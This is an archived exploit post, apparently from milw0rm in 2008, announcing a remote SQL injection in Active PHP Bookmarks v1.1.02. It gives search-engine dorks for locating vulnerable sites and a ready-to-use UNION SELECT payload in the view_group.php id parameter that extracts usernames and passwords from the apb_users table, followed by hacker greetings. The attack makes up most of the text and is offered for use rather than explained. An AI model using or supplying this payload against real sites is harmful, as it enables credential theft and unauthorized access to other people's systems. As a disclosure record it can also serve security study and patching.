|___________________________________________________| | | Bookmarks V 1.1.02 (id) Remote SQL Injection Vulnerability | |___________________________________________________ |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : www.tryag.cc/cc | | email: darkangel_g85[at]Yahoo[DoT]com | |___________________________________________________ | | | | script : http://lbstone.com/apb/?version=1.1.02 | | DorK : Powered by Active PHP Bookmarks v1.1.02 | | DorK : inurl:bookmarks/view_group.php?id= |___________________________________________________| Exploit: www.[target].com/Script/view_group.php?id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8+from+apb_users-- ____________________________( Greetz )____________________________ | | tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke | | Iraqihack | FAHD | mos_chori | Silic0n | |_________________________________________________________________ Im IRAQi # milw0rm.com [2008-08-19]